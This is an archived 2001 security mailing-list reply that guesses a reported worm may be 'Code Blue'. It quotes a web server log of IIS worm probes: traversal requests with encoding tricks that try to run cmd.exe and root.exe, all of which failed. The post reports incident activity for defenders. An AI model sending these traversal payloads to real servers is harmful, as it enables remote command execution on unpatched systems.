Re: New Worm ?

From: Andrew Sheldon (forensicsat_private)
Date: Tue Sep 18 2001 - 08:31:34 PDT

Next message: Oliver Ehli: "Re: New Worm ?"

Previous message: Paul W. Roach III: "Re: New Worm ?"
In reply to: Cory McIntire: "New Worm ?"
Next in thread: Oliver Ehli: "Re: New Worm ?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Could this be "Code Blue".
Further details can be found here: 
    Code Blue targets Red China
        http://www.theregister.co.uk/content/56/21564.html

shelly

*********** REPLY SEPARATOR  ***********

On 18/09/2001 at 09:43 Cory McIntire wrote:

>Hello, 
>I and a few others I know are getting bombard on our machines with IIS 
>requests....looks like another worm, and its much smarter than before, it 
>seems to stay within the same class A and sometimes the same class B as
>the 
>attacking machine is in. here is an excerpt of what i believe is the full 
>scan....
>
>204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET
>/MSADC/root.exe?/c+dir 
>HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:14 -0500] "GET
>/scripts/root.exe?/c+dir 
>HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET 
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET 
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET 
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET 
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET 
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-"
>"-"
>204.120.69.195 - - [18/Sep/2001:09:35:22 -0500] "GET 
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET 
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
>"-"
>204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET 
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>
>just thought I would let you guys know...this one looks bad
>fella.....thank 
>god for apache.....that is of course, if there isnt a huge bog down on the 
>net....=[
>
>cory
>
>-----------------------------------------------------------------
>This list is provided by the SecurityFocus ARIS analyzer service.
>For more information on this free incident handling, management 
>and tracking system please see: http://aris.securityfocus.com




-----------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Oliver Ehli: "Re: New Worm ?"
Previous message: Paul W. Roach III: "Re: New Worm ?"
In reply to: Cory McIntire: "New Worm ?"
Next in thread: Oliver Ehli: "Re: New Worm ?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 09:33:23 PDT